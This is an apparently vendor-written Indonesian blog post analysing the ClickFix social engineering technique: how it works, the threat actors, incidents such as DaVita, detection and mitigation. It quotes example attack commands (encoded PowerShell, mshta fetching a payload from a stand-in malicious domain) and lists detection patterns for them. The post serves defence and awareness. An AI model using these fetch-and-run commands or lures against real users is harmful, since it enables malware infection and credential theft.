Kembali ke Blog
Threat IntelligenceClickFixSocial EngineeringRansomwareAPTThreat IntelligenceCybersecurity Indonesia

ClickFix: Teknik Social Engineering yang Menipu Korban untuk Menginfeksi Diri Sendiri

ClickFix tumbuh 517% dalam setengah tahun dan kini menjadi vektor serangan terbesar kedua di dunia. Uniknya, tidak ada exploit — korban sendiri yang menjalankan malwarenya. Artikel ini mengupas tuntas cara kerja, kampanye nyata (DaVita, APT28, Kimsuky), dan bagaimana organisasi Anda bisa bertahan.

Tim Riset CloudSphere

Threat Intelligence & Security Research

1 Juli 2026
15 menit baca

Apa Itu ClickFix?

ClickFix adalah teknik social engineering yang memanipulasi korban agar secara sukarela menjalankan perintah berbahaya di perangkat mereka sendiri. Tidak ada exploit, tidak ada attachment mencurigakan — yang ada hanyalah sebuah halaman web dengan instruksi yang tampak resmi, dan korban yang menekan tombol Enter.

Ini bukan kerentanan teknis. Ini adalah serangan terhadap psikologi manusia — jauh lebih sulit diblokir oleh teknologi keamanan konvensional karena pengguna sendiri yang menjadi 'last mile executor' serangan.

Serangan #2 Terbesar di Dunia (H1 2025)

ClickFix menyumbang ~8% dari seluruh serangan yang diblokir secara global, menjadikannya vektor serangan terbesar kedua setelah phishing biasa. Pertumbuhan H1 2025 vs H2 2024: +517% (ESET Threat Report H1 2025).

Cara Kerja ClickFix — Step-by-Step

ClickFix berhasil karena tampilannya meyakinkan dan instruksinya terasa wajar. Berikut anatomi lengkap serangan ini dari awal hingga infeksi.

01

Initial Lure — Menggiring Korban ke Halaman Berbahaya

Korban diarahkan ke halaman web berbahaya melalui berbagai jalur:

  • Email phishing berisi link yang tampak sah
  • Malvertising — iklan berbahaya di situs streaming atau download ilegal
  • SEO poisoning — situs berbahaya muncul tinggi di hasil pencarian
  • Situs WordPress yang telah dikompromisi
  • GitHub issue notifications palsu
  • Forum atau media sosial yang mempromosikan software crack
02

Fake Verification Page — Halaman Verifikasi Palsu

Halaman menampilkan lure yang tampak sangat meyakinkan, antara lain:

  • Fake reCAPTCHA/CAPTCHA: 'Klik I'm not a robot untuk melanjutkan'
  • Fake Cloudflare Turnstile: 'Bot protection verification required'
  • Browser error: 'Browser Anda tidak dapat menampilkan konten ini'
  • Fake Google Meet/Teams/Zoom: 'Microphone Anda bermasalah, jalankan perbaikan'
  • Fake Windows BSOD: tampilan blue screen penuh dengan instruksi 'repair'
03

Clipboard Hijacking — Injeksi Clipboard Tersembunyi

Saat korban mengklik tombol ('I'm not a robot', 'Fix It', 'Verify'), JavaScript yang tertanam di halaman secara otomatis menyalin perintah berbahaya ke clipboard korban — tanpa sepengetahuan korban. Kode berbahaya diletakkan di awal string sementara 'komentar' non-eksekutif ditempatkan di akhir untuk menyamarkan isi clipboard.

04

User Execution via Win+R — Korban Menjalankan Perintahnya Sendiri

Pop-up muncul dengan instruksi yang tampak resmi: 'Tekan Windows+R, lalu tekan Ctrl+V, lalu tekan Enter untuk menyelesaikan verifikasi.' Korban mengikuti instruksi ini tanpa menyadari bahwa mereka baru saja menjalankan perintah berbahaya di terminal Windows mereka. Di macOS, korban diarahkan membuka Terminal dan menempelkan perintah bash/curl.

05

Payload Download — Mengunduh Malware

Perintah yang dijalankan biasanya berbentuk PowerShell ter-encode atau MSHTA yang mengunduh payload dari server penyerang. Contoh nyata dari analisis Group-IB:

  • powershell.exe -eC [BASE64_ENCODED_COMMAND]
  • powershell.exe -WindowStyle Hidden -EncodedCommand [...]
  • mshta.exe 'https://domain-berbahaya.com/payload'
06

Multi-Stage Delivery — Infeksi Berlapis Tanpa File

Loader mengunduh stage kedua dari domain yang berputar. Stage dua menambahkan persistensi (registry, scheduled task), mencoba menonaktifkan proteksi, dan menginjeksi payload akhir ke dalam proses Windows yang legitimate (seperti explorer.exe). Payload akhir — biasanya infostealer atau RAT — berjalan murni di memori tanpa menulis file ke disk, sehingga lolos dari banyak antivirus tradisional.

Sejarah & Evolusi ClickFix

ClickFix bukan teknik yang tiba-tiba muncul. Ia berevolusi secara bertahap dari trik sederhana menjadi alat pilihan kelompok espionage tingkat negara.

PeriodePeristiwa Penting
Oktober 2023Deteksi pertama — varian sederhana menyamar sebagai Cloudflare anti-bot. Belum bernama 'ClickFix'
Maret 2024Proofpoint mendokumentasikan secara luas. TA571 dan ClearFake cluster menjadi pengguna pertama. Nama 'ClickFix' mulai digunakan
Mei 2024ClearFake mengintegrasikan ClickFix + EtherHiding (payload tersembunyi di smart contract BNB Chain). Payload: Emmenhtal Loader dan Lumma Stealer
Agustus 2024Adopsi massal. SmartApeSG mendistribusikan Remcos RAT, NetSupport RAT, StealC, dan Sectop RAT via ClickFix
Oktober 2024APT28 (Rusia) mulai menggunakan ClickFix — pertama kali teknik kriminal ini diadopsi aktor negara
November 2024MuddyWater (Iran) menyerang 39+ organisasi Timur Tengah dengan ClickFix
Desember 2024UNK_RemoteRogue (Rusia) menyerang produsen senjata pertahanan
Jan–Feb 2025Kimsuky (Korea Utara) mulai menggunakan ClickFix menarget think tank kebijakan DPRK
H1 2025ESET melaporkan lonjakan +517%. ClickFix menjadi vektor serangan terbesar kedua di dunia
Juni 2025Peneliti mr.d0x memperkenalkan FileFix — evolusi ClickFix menggunakan Windows File Explorer address bar. 14 hari kemudian sudah digunakan di serangan nyata
Q1 2026Tujuh varian aktif teridentifikasi: ClickFix original, TerminalFix, DownloadFix, FileFix, ClickFake Interview, CrashFix, dan varian macOS Matryoshka

Siapa yang Menggunakan ClickFix?

Yang membuat ClickFix sangat mengkhawatirkan bukan hanya prevalensinya, tetapi siapa yang menggunakannya. Dalam jendela 90 hari antara Oktober 2024 – Januari 2025, lima kelompok nation-state dari empat negara berbeda mengadopsi teknik ini — rekor adopsi teknik kriminal oleh aktor negara yang belum pernah terjadi sebelumnya.

Aktor Kriminal

  • TA571 — Initial Access Broker, pengguna pertama ClickFix
  • ClearFake — Fake browser update + EtherHiding
  • SmartApeSG (ZPHP) — Multi-payload delivery chain
  • Storm-1865 — Kampanye Booking.com global
  • Storm-1607 — Puluhan ribu email ke AS & Kanada
  • Interlock Group — Ransomware ke sektor healthcare

Nation-State / APT

  • APT28 (Rusia) — Espionage via fake Google Spreadsheet
  • UNK_RemoteRogue (Rusia) — Menyerang produsen senjata
  • MuddyWater (Iran) — 39+ org di Timur Tengah
  • Kimsuky (Korea Utara) — Think tank kebijakan DPRK
  • APT36 / Transparent Tribe (Pakistan) — Dikonfirmasi Mei 2025

Malware yang Dikirimkan via ClickFix

ClickFix bersifat agnostik terhadap payload — ia hanyalah pintu masuk. Begitu korban menjalankan perintah, hampir semua jenis malware dapat dikirimkan. Inilah yang membuatnya begitu berbahaya: satu teknik social engineering yang sama bisa berujung pada pencurian data, ransomware, atau operasi espionage.

Lumma Stealer

Infostealer

Payload paling umum — bertanggung jawab atas 51% infeksi ClickFix. Mencuri credentials browser, crypto wallet, session cookie, dan 2FA codes.

NetSupport RAT

RAT

Remote Access Trojan menggunakan tool legitimate NetSupport Manager untuk menyembunyikan aktivitasnya dari deteksi keamanan.

Interlock Ransomware

Ransomware

Kelompok Interlock menggunakan ClickFix sebagai initial access sebelum deploy ransomware di sektor healthcare — DaVita dan Kettering Health menjadi korban nyata.

QuasarRAT

Espionage

Open-source RAT yang digunakan Kimsuky (Korea Utara) untuk operasi espionage terhadap think tank kebijakan DPRK di AS dan Jepang.

DarkGate & Latrodectus

Loader

Loader modular multi-fungsi yang dapat mengunduh payload tambahan, membangun persistensi, dan beroperasi sebagai backdoor jangka panjang.

AMOS (Atomic macOS Stealer)

macOS

Varian khusus macOS yang mencuri credentials browser, crypto wallet, dan data sensitif lainnya — ClickFix bukan ancaman eksklusif Windows.

Insiden Nyata & Kampanye Terdokumentasi

ClickFix bukan sekadar teknik teoritis. Berikut adalah kampanye dan insiden nyata yang terdokumentasi dengan baik — membuktikan dampak nyata serangan ini di berbagai industri dan geografi.

DaVita Ransomware — Maret 2025

Healthcare

Penyedia dialisis ginjal terbesar kedua di AS. Intrusi awal via ClickFix pada 24 Maret 2025, terdeteksi 12 April. Interlock ransomware mengklaim 1,5 TB data curian — 2,7 juta data pasien terekspos.

Kettering Health — Mei 2025

Healthcare

14 rumah sakit dan 120+ klinik di Midwest AS. Serangan Interlock ransomware via ClickFix menyebabkan ribuan prosedur medis dibatalkan. Data pasien, rekam medis, laporan bank, dan scan paspor dicuri.

Storm-1865 Booking.com — Des 2024

Hospitality

Email palsu dari 'Booking.com' ke staf hotel tentang 'ulasan negatif tamu'. Target: Asia Selatan, Asia Tenggara, North America, Oceania, Eropa. Payload: XWorm, Lumma Stealer, VenomRAT, AsyncRAT, Danabot.

APT28 Espionage — Oktober 2024

Nation-State

Rusia (APT28) meniru Google Spreadsheet dengan fake reCAPTCHA. Saat korban 'memverifikasi', mereka tanpa sadar membuka SSH tunnel ke server Metasploit — digunakan untuk operasi espionage.

MuddyWater / Iran — November 2024

Nation-State

Sengaja dilancarkan bertepatan dengan Microsoft Patch Tuesday agar email 'security alert' terlihat meyakinkan. Menyerang 39+ organisasi keuangan dan pemerintah Timur Tengah dengan Level RMM tool untuk espionage.

Kimsuky / Korea Utara — Jan 2025

Espionage

Meniru korespondensi diplomatik Jepang untuk menipu peneliti think tank kebijakan DPRK di AS, Jepang, dan Korea Selatan. Korban melihat PDF decoy sementara QuasarRAT diinstall di latar belakang.

Statistik & Prevalensi 2025

Data kuantitatif berikut memberikan gambaran betapa masifnya adopsi ClickFix dalam waktu singkat — dari teknik niche menjadi ancaman global yang dihadapi hampir setiap organisasi.

+517%

Pertumbuhan serangan H1 2025 vs H2 2024

ESET Threat Report

#2

Vektor serangan terbesar di dunia setelah phishing biasa

ESET H1 2025

~8%

Dari seluruh serangan yang diblokir secara global (H1 2025)

ESET

47%

Notifikasi initial access Microsoft Defender Experts melibatkan ClickFix

Microsoft

5 APT

Kelompok nation-state dari 4 negara berbeda dalam 90 hari

Proofpoint

51%

Infeksi ClickFix mengantarkan Lumma Stealer sebagai payload utama

Industry Analysis

Mengapa Pengguna Jatuh Korban?

ClickFix berhasil bukan karena kegagalan teknologi, tetapi karena mengeksploitasi bagaimana otak manusia bekerja. Memahami faktor psikologis ini adalah langkah pertama untuk membangun kesadaran yang efektif.

Verification Fatigue

Bertahun-tahun CAPTCHA dan prompt keamanan telah mengkondisikan pengguna untuk menyelesaikannya secara otomatis tanpa scrutiny. Mereka dianggap 'hambatan biasa', bukan tanda bahaya.

Authority Mimicry

Halaman ClickFix meniru layanan tepercaya secara pixel-perfect: Google reCAPTCHA, Cloudflare, Booking.com, Microsoft Office. Kepercayaan terhadap merek ini ter-transfer ke halaman palsu.

Problem-Solution Framing

ClickFix selalu hadir dengan 'masalah' (browser error, video tidak bisa dimuat) disertai 'solusi' yang terlihat mudah dan logis. Otak manusia secara instinktif ingin menyelesaikan masalah.

Urgency Creation

Countdown timer, counter palsu '127 pengguna telah diverifikasi', dan peringatan 'akun akan diblokir' menciptakan tekanan psikologis yang mengurangi kemampuan berpikir kritis.

Memanfaatkan Security Awareness

Pengguna yang sudah 'melek phishing' waspada terhadap attachment. ClickFix tidak menggunakan attachment — ini adalah halaman web normal dengan instruksi teknis. Pertahanan kognitif konvensional tidak berlaku.

Ilusi Kontrol

Korban merasa 'memiliki kontrol' karena merekalah yang memilih menekan tombol. Padahal mereka sedang dimanipulasi. Ini jauh lebih efektif secara psikologis dari drive-by download.

Cara Mendeteksi Serangan ClickFix

ClickFix dirancang untuk lolos dari deteksi tradisional karena tidak ada file berbahaya yang diunduh di awal — yang ada hanyalah pengguna yang menjalankan perintah. Namun ada beberapa artifact dan sinyal yang dapat dideteksi.

Metode DeteksiYang DicariTool/Platform
Registry AuditRunMRU key berisi PowerShell, mshta, certutil, Base64 strings, atau -WindowStyle HiddenWindows Registry / SIEM
Windows Event ID 4688powershell.exe atau mshta.exe yang di-spawn oleh explorer.exe (bukan IDE atau terminal)Windows Event Log / SIEM
PowerShell Script Block (Event 4104)EncodedCommand, DownloadString, Invoke-Expression, atau URL download di dalam skripPowerShell Logging / SIEM
EDR Behavioral DetectionProcess chain: explorer.exe → powershell.exe → mshta.exe / certutil.exe / bitsadmin.exeEDR / XDR Platform
Network DetectionOutbound ke domain baru (<30 hari), PowerShell dengan user-agent tidak biasa, DNS query ke domain tidak dikenalFirewall / IDS / DNS Filter
Threat Intel IntegrationIoC dari Recorded Future Risk Lists, VirusTotal, ANY.RUN untuk domain dan hash terkait ClickFix aktifSIEM / Threat Intel Feed

Pencegahan & Mitigasi ClickFix

Tidak ada satu kontrol yang cukup untuk menghentikan ClickFix. Diperlukan kombinasi technical hardening, people training, dan detection capability yang bekerja berlapis.

  • Security Awareness Training

    Latih pengguna untuk TIDAK PERNAH menjalankan perintah dari instruksi halaman web. Tunjukkan contoh nyata halaman ClickFix. Sampaikan: 'Tidak ada CAPTCHA yang memerlukan Anda membuka Run dialog atau Terminal.'

  • Nonaktifkan Windows Run Dialog via GPO

    User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu. Ini menghilangkan vektor eksekusi utama ClickFix.

  • PowerShell Hardening

    Terapkan Constrained Language Mode, aktifkan Script Block Logging dan Transcription Logging, set Execution Policy ke AllSigned atau Restricted untuk pengguna non-admin.

  • Blokir mshta.exe untuk Pengguna Standar

    MSHTA adalah LOLBIN (Living Off the Land Binary) favorit ClickFix. Deploy AppLocker atau WDAC untuk mencegah eksekusinya oleh pengguna non-administrator.

  • Deploy EDR dengan Behavioral Protection

    Pastikan EDR mampu mendeteksi process chain mencurigakan dan ter-update dengan signature ClickFix terbaru. Behavioral detection jauh lebih efektif dari signature-based untuk ancaman ini.

  • DNS Filtering & Web Proxy

    Blokir domain berbahaya yang dikenal, domain baru (<30 hari), dan situs yang belum terkategorisasi. Malicious Domain Blocking and Reporting (MDBR) service memberikan perlindungan tambahan.

  • Email Security dengan URL Sandboxing

    Filter email berisi link ke domain baru, sandbox URL sebelum pengguna dapat mengklik, dan terapkan SPF/DKIM/DMARC untuk mencegah domain spoofing.

  • Application Allowlisting

    Buat daftar putih aplikasi yang boleh dieksekusi dan blokir file yang tidak dikenal dari %APPDATA%, %TEMP%, dan direktori lainnya yang sering digunakan oleh ClickFix loader.

Situasi Asia Tenggara & Indonesia

Meskipun tidak ada kampanye ClickFix yang secara eksklusif menarget Indonesia yang terdokumentasi penuh, beberapa kampanye besar telah secara eksplisit menyebut Asia Tenggara sebagai target — dan faktor risiko Indonesia sangat signifikan.

Kampanye Storm-1865 yang meniru Booking.com (Desember 2024 – Maret 2025) secara eksplisit menarget 'South and Southeast Asia' bersama North America, Oceania, dan Eropa. Mengingat besarnya industri perhotelan dan pariwisata Indonesia, kemungkinan dampaknya sangat nyata.

Faktor Risiko Indonesia yang Perlu Diwaspadai

210+ juta pengguna internet, sektor UMKM yang masif dan semakin digital, industri perhotelan besar yang menjadi target Storm-1865, tingkat security awareness yang masih perlu ditingkatkan, dan prevalensi penggunaan layanan global (Google, Microsoft) yang menjadi target ideal ClickFix. Selama Ramadan/Lebaran, phishing — termasuk teknik berbasis ClickFix — meningkat 30% menurut data LKDI.

Serangan siber di Asia Tenggara berlipat ganda pada 2024 vs 2023

Positive Technologies

57.000+

Insiden ransomware di Asia Pasifik dalam H1 2024

Industry Report

Top 6

Indonesia masuk daftar negara paling terdampak ransomware di Asia Tenggara

Regional Analysis

ClickFix tidak memerlukan exploit — hanya manipulasi psikologis. CloudSphere membantu organisasi Anda menguji ketahanan terhadap social engineering attack melalui Security Assessment & VAPT.

Topik Terkait

ClickFixSocial EngineeringRansomwareAPTThreat IntelligenceCybersecurity Indonesia